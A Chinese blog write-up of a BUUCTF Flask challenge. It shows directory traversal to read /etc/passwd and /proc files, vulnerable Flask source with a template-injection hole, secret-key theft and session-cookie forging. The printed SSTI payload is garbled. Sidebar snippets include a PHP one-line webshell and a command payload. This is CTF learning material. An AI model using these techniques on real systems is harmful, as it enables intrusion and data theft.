CTF-任意文件上传2(3)

已于 2024-06-01 23:47:51 修改
阅读量361 收藏 5
点赞数 5
分类专栏: CTF 文章标签: web安全
于 2024-06-01 23:44:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K_DREAM_G/article/details/139381368
版权

题目—[第一章 web入门]afr_3

来源BUUCTF
整个题目思路流程就是发现源码,尝试直接提交查询哪里模板注入,发现被禁,发现session,构造session。

思路

在这里插入图片描述
在该页面找信息比如F12,git源码,或者提交查询这个(一个思路)。
正确流程是在提交查询这里!
在这里插入图片描述
按照提示去
在这里插入图片描述
发现url出可能有目录穿越,测一下,…/…/…/…/…/…/etc/passwd
在这里插入图片描述
尝试直接读取flag,发信被禁止那么这里应该是有过滤。尝试php伪协议发现不行,应该不是php语言写的了。那就想着找环境变量等其他敏感文件。
在这里插入图片描述
发现有server.py文件是python语言。
知识点proc目录

访问.py文件试试
在这里插入图片描述
发现源码整理得

#!/usr/bin/python
import os
from flask import Flask, render_template, request, url_for, redirect, session, render_template_string
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')
execfile('key.py')
FLAG = flag
app.secret_key = key

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
        if "n1code" not in session or session['n1code'] is None:
            session['n1code'] = n1code
            template = None
            if session['n1code'] is not None:
                template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
            session['n1code'] = None
            return render_template_string(template)

@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")

@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    if page.find('flag') >= 0:
        page = 'notallowed.txt'
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e
    return render_template('article.html', template=template)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=False)

经过代码分析/n1page目录下存在模板注入

if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
        if "n1code" not in session or session['n1code'] is None:
            session['n1code'] = n1code
            template = None
            if session['n1code'] is not None:
                template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
            session['n1code'] = None
            return render_template_string(template)

代码大概意思是如果参数不为空,现对参数中数据的字符进行匹配并替换,然后如果n1code这个键不在在session中或者session[‘n1code’]这个值为空则将其内容进行一个替换,然后如果session[‘n1code’]的值不为空则将其内容拼接到template中。
知识点SSTI模板注入
如何判断ssti模板注入

接上述:
上面提到了session(cookie中),还有key.py这个文件
访问key这个文件得到密钥
在这里插入图片描述
利用flask-session-cookie-manager工具解密并构造playload
{{[].class.base.subclasses()40.read()}}

在这里插入图片描述
下面就是抓包改sesion的值就行了

木筏.
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-web
weixin_43150428的博客
11-04 2761
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
CTFweb学习记录 -- 文件上传
lifanxin的博客
06-21 1406
文件上传概述一句话木马常见攻击手段JS检测绕过攻击总结 概述   所谓文件上传漏洞,就是web服务器对上传的文件没有做好检测和过滤,从而使得恶意用户可以上传脚本程序到服务器,进而获得服务器权限。这个恶意脚本文件,又被称为WebShell,因此也可以将WebShell脚本作为一种网页后门,一般通过上传的脚本文件,我们可以查看服务器的目录结构和文件,亦或者执行系统命令等。 一句话木马   这里先介绍web服务器没有对上传的文件进行任何检测的情况下,我们应该如何攻击。   利用一句话木马,即上传一句话木马脚本文件
CTF文件上传
博客
07-25 791
练习平台 GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场 https://github.com/c0ny1/upload-labs 参考链接 Upload-labs文件上传(11-19) - tdcoming’blog QQ group 906755997 - CSDN博客 https://blog.csdn.net/qq_29647709/...
腾讯犀牛鸟CTF文件上传题目解析
hxhxhxhxx的博客
07-06 375
腾讯犀牛鸟CTF文件上传题目解析 对上传功能点进行测试,发现限制了图片大小范围。 那么我们就找一个符合范围的图片。 反复尝试,发现,PHp大小写可以绕过,pht也可以绕过,同时构造头GIF89a,就可以绕过。然后蚁剑进行连接。 flag值: flag{Aa3c7c37508E40B3} ...
CTF赛题分析之 Flask 目录穿越
最新发布
zzz6583zz的博客
08-10 271
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
文件上传+CTF题目
unexpectedthing的博客
10-27 2475
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
CTF-Web文件上传漏洞学习笔记(ctfshow题目)
jayq1的博客
06-03 2864
文件上传漏洞学习笔记,ctfshow题目为依托
文件上传典型题(buuctf)加深知识点
Z11762的博客
04-19 804
89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本置标语言)网页文件中的服务器端脚本代码。0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
4. **文件包含漏洞**:了解如何通过文件包含漏洞执行任意代码,以及防御措施,如限制可包含文件类型、使用绝对路径和禁止远程文件包含。 5. **权限与配置管理**:学习如何利用不正确的权限设置或配置,如目录遍历和...
CTF技能梳理系列 ---- 文件上传
Joker_York的博客
09-02 1478
主要以CTFHub技能树里的文件上传题目为例 无验证 直接上传webshell。 <?php @eval($_GET[cmd]); ?> payload: http://url/upload/raw_shell.php?cmd=system("cat ../flag_161493477.php"); 前端验证 查看页面源码,可以看到前端的JS验证代码: <script> function checkfilesuffix() { var file=document.
CTFhup文件上传漏洞练习
weixin_51583379的博客
09-15 1077
我们先上传一个正常的图片发现可以上传,我们再试试上传一个shell,发现上传不了。上传22.jpg 跟第四关的22.jpg一样,再bp抓包,修改后缀为php。我们再在中国蚁🗡上面写上shell地址和shell里面的值。发现上传成功我们用中国蚁🗡连接一下上传的shell地址。上传一个shell.php用bp抓包,修改这个。我们再上传一个shell,发现可以成功上传。我们再上传一个shell试试,发现上传不了。再发包,发现上传成功了,中国蚁🗡连接成功了。我们上传一个正常图片试试,发现上传成功。
buuctf文件上传漏洞(Pass1~15,网络安全面试题目2024
m0_58269520的博客
04-05 1046
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;在指定字符串中从后面开始的第一次出现的位置,如果成功,则返回从该位置到字符串结尾的所有字符,如果失败,则返回 false。③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CTF文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 5621
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTF-文件上传之PHP(持续更新)
m0_74317362的博客
07-27 1301
将一句话木马保存成1.jpg格式,选择1.jpg文件,用burp拦截数据包,讲文件类型改成php。上传1.php文件用burp拦截请求,将Content-Type改成image/jpeg。将文件命名成"1.php " 就可以上传,windows的需要burp修改数据包。将文件命名成1.php.就可以上传,windows的需要burp修改数据包。上传1.php文件,用burp修改数据包1.php后面加上::$DATA。正确步骤开始,先上传图片马,不修改后缀,再上传.htaccess文件。
buuctf文件上传漏洞(Pass1~15,网络安全面试题选择题
2401_83945851的博客
04-03 760
对于黑名单,先检查是否禁止.htaccess,如果被禁止,就看能不能点,空格,大小写等绕过。
CTFHub-Web-文件上传
qq_54037445的博客
11-29 3150
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端会验证,只能上传图片中列出的类型将文件名后缀含有的这些全部替换为空。
CTF-网页上传题
weixin_45441727的博客
03-18 1697
1.根据下方代码上传名为1.php的文件 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type']
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值